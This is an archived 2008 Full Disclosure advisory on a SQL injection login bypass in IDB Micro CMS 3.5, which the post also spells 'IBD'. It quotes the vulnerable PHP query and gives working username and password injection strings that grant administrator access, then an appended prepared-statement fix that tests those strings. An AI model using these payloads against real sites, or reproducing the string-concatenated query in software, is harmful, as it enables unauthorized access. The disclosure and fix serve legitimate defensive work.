Full Disclosure mailing list archives
[SkyOut/Wired Security] SQL Injection in IDB Micro CMS 3.5 (Login Bypass)
From: <skyout.fd () wired-security net>
Date: Mon, 12 May 2008 18:39:52 +0200
Hey guys,

I came across a SQL Injection bug in IBD Micro CMS in version 3.5 and maybe lower...

News about it:
http://wired-security.net/archive/2008/may/index.php#12052008

Advisory to read:
http://wired-security.net/texts/advisories/IBD_Micro_CMS_3.5_SQL_Injection_Login_Bypass_Advisory.txt

--- In Short: ---

--- SNIP ---
if ($i == 0) {
    $sql = ' SELECT * FROM microcms_administrators WHERE administrators_username = "' . $_POST['administrators_username'] . '" and administrators_pass = PASSWORD("' . $_POST['administrators_pass'] . '")';
    $user_result = mysql_query($sql);
--- SNIP ---

Username: " or "1" = "1
Password: ") or "1" = "1" or PASSWORD("

Will result in:

--- SNIP ---
$sql = ' SELECT * FROM microcms_administrators WHERE administrators_username = "" or "1" = "1" and administrators_pass = PASSWORD("") or "1" = "1" or PASSWORD("")';
--- SNIP ---

-> Logged in as administrator!

Greets,
SkyOut/Wired Security

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
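The login check from the advisory rewritten with a bound parameter, as an added example that is not part of the original post or the vendor's code. Assumptions: the function name check_admin_login is hypothetical, PDO with an in-memory SQLite database stands in for the CMS's MySQL database, password_hash()/password_verify() replace MySQL's PASSWORD(), and the sample account is constructed.

```php
<?php
// Added example (not from the advisory or the vendor). Assumptions: PDO with an
// in-memory SQLite database stands in for the CMS's MySQL database, and
// password_hash()/password_verify() replace MySQL's PASSWORD().

function check_admin_login(PDO $pdo, string $username, string $password): bool
{
    // The placeholder keeps the username as data; it is never spliced into the SQL text.
    $stmt = $pdo->prepare(
        'SELECT administrators_pass FROM microcms_administrators
         WHERE administrators_username = :username'
    );
    $stmt->execute([':username' => $username]);
    $hash = $stmt->fetchColumn();

    // Unknown user: no row, so fetchColumn() returns false.
    if ($hash === false) {
        return false;
    }
    // The password is compared in PHP and never reaches the database.
    return password_verify($password, $hash);
}

$pdo = new PDO('sqlite::memory:');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$pdo->exec('CREATE TABLE microcms_administrators (
    administrators_username TEXT PRIMARY KEY,
    administrators_pass TEXT NOT NULL)');

// Constructed sample account.
$insert = $pdo->prepare('INSERT INTO microcms_administrators VALUES (?, ?)');
$insert->execute(['admin', password_hash('correct horse', PASSWORD_DEFAULT)]);

// Inputs: the two strings quoted in the advisory, then the constructed account.
$cases = [
    ['" or "1" = "1', '") or "1" = "1" or PASSWORD("'],
    ['admin', 'wrong password'],
    ['admin', 'correct horse'],
];
foreach ($cases as [$user, $pass]) {
    $result = check_admin_login($pdo, $user, $pass) ? 'accepted' : 'rejected';
    printf("%-16s => %s\n", $user, $result);
}
```

Only the third case is accepted: the advisory's username is looked up as a literal string that matches no row, so the quote characters never change the structure of the WHERE clause.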